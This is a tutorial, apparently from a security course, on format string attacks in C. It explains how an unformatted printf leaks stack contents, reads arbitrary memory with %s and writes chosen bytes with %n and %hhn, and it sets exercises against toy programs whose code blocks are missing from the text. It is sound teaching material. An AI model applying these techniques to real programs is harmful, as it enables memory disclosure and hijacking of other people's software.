Format strings

We now study another classic program exploitation technique. A format string is a string containing format directives such as %d and %s in printf. These directives are interpreted and substituted with appropriate values. For example:

substitutes %d with the value of integer variable r and prints the resulting string.

A classic mistake is to directly print a string s without specifying a format. A string should always be printed as follows:

Consider now the following piece of code, where the string buffer is printed directly, without specifying a format "%s":

Printing a string this way is a security vulnerability: if we provide, as input, strings containing format directives, these will be interpreted and will leak (and possibly modify) memory values. We show some examples below.

First notice that the compiler rises a security warning regarding the direct printf of a string. Programmers should always take this warning seriously and fix the issue.

Let us now analyse what is happening: The call to printf in the program interprets %08x as a format directive and prints (as hexadecimal) the first parameter of printf, padded with zeros up to 8 digits. The problem is that there are no parameters! The printf function looks for the first parameter on the top of the stack of the calling function, since parameters are pushed on the stack just before calling a function as depicted below:

saved ebp (calling function)
return address (calling function)
first parameter
second parameter
….

So, if we go on adding format directives we can print the whole stack of the calling function. Since the string we are printing is stored on the stack in the buffer array, if we print enough words we will soon or later find it. A trick to immediately see the string is to prepend an easy to see pattern such as the “classic” AAAA (41414141 in hexadecimal), as shown in the following example:

It is easy to see the word containing 41414141, which is the beginning of our string.

Direct access to parameters

Once we know the position on the stack (in this case it is the seventh word on the stack) we can refer directly to the corresponding parameter as follows:

The format %7$08x is like %08x but instead of printing the next parameter on the stack it prints the one specified before the dollar symbol, the seventh in this case. We can also print the same parameter more than once:

Exercise

Try to reveal the content of the PIN array (containing a secret PIN) through a format string attack. Hint: Since the array is allocated on the stack, use %x and not %s.

Printing arbitrary memory locations

Now that we know where our string is located on the stack we can do more. The format directive %s is used to print strings: the corresponding parameter on the stack is interpreted as the string address and the pointed string is consequently printed (the pointer is dereferenced!). This allows us for printing a string at an arbitrary memory location: we replace AAAA with the target address and we place a %s in the format string in the place corresponding to the 41414141 output. This will interpret our address as a pointer to the string and will print the string starting at such an address.

Exercise

Consider the following program and try to print the supersecret string using the technique discussed above.

Notice that the string is NOT on the stack, thus it would never be printed by increasing the number of %x directives in the format string.

Hint: You can use objdump -D and/or gdb to find the string address.

The following video illustrates the solution (try yourself before watching this):

Writing with format strings

So far, we have seen how to print the content of arbitrary memory locations. There exist format directives that modify memory. We can try to exploit them to modify the content of a memory address. In particular, we illustrate the %n directive that writes into an integer variable the number of bytes written so far by the printf. Try the following example:

We obtain the following output

Using echo and wc we can double check that 40 and 87 are, in fact, the number of bytes written up to the point where the two %n are placed:

Consider our previous example modified as follows:

It prints the address, the string and the first four bytes of the string in hexadecimal notation, before and after the input of the format string (i.e., where the format string attack happens):

We now know the address of the string 0x08048640 and we can easily reproduce the attack that leaks the supersecret string on this particular code:

Now, if we replace %s with %n in the attack we should, in principle, be able to write on the string.

it did not work, and we get a segmentation fault error instead! To understand what is happening we examine program sections with objdump -h

Our string is in a read-only section .rodata which goes from address 0x08048620 to address 0x080486c2 (0x08048620 + 0xa2), from which the segmentation fault. In fact we are declaring the variable as

which is a constant char array. We need to remove the const modifier to make it writable:

Now the variable is in a read-write segment .data. In fact, the elements of an array should be modifiable:

We try again to write on the string:

We did it! The first byte of the string has been written with the number of written bytes 0x05, which is the first four bytes of address \x40\xa0\x04\x08 plus the dot before %11$n.

Notice that by declaring the variable as

we would also get a segmentation fault error as, in this case, the string would be stored into the read-only section and only the pointer to it, named supersecret, would be modifiable.

Writing something useful

The technique becomes interesting if we can have control on what we write. An easy way to do this is to use %100x which writes 100 characters (the output is padded with spaces as needed to reach the 100 limit). So if we want to write 0xbeef we can compute 0xbeef - 0x4 = 48875 and add a %48875x directive before the %11$n, so that the number written will be 48875 + 4 (the four bytes of the address). Let’s try it:

It worked! we have written 0xbeef on the two bytes of the word! Notice that the string is very long (0xbeef=48879 bytes in fact). We can make a much shorter payload attack writing byte by byte as shown in the following example.

Example

We show how to write 0xfeedbeef byte by byte little-endian as 0xef 0xbe 0xed 0xfe.

To write four bytes we can put the four addresses one after the other and refer to them using the direct access to parameters trick above. We also use the hh directive before the n to indicate we are writing a half-half-word which is a byte.

Good! We have written 0x10 on the four bytes which is 16 in decimal. In fact, we now have 4 addresses of 4 bytes which give 16 written bytes. The four hhn directives writes 16 on the corresponding addresses.

To write 0xef 0xbe 0xed 0xfe we now have to compute how much padding we need to insert before the respective hhn directives.
We start from the first byte. We can do the math it in a python shell as follows:

We thus add a %223x directive before the %11$hhn:

It works! We have written 0xef on the four bytes. We can now go on computing the padding to write the second byte.

Uh! The second byte is supposed to be 0xbe which is less than 0xef. No problem. We observe that in order to write 0xbe we can in fact write 0x1be since the hhn directive will only write one byte, i.e., 0xbe.

Thus for the following three bytes we have:

Now we can directly add %207x, %47x, %17x before %12$hhn, %13$hhn, %14$hhn, respectively.

Good, we did it!

Exercise 1

Write 0xdeadbeef on the four bytes of the string.

Exercise 2

Write again 0xdeadbeef using the hn directive that writes a half-word, i.e., 2 bytes. In this variant you only need two %n directives and two addresses of the half-words.

Exercise 3

Write “beef” at the beginning of the string so to overwrite “This”. Try also to terminate the string right after “beef”.

Leave a Reply

Your email address will not be published. Required fields are marked *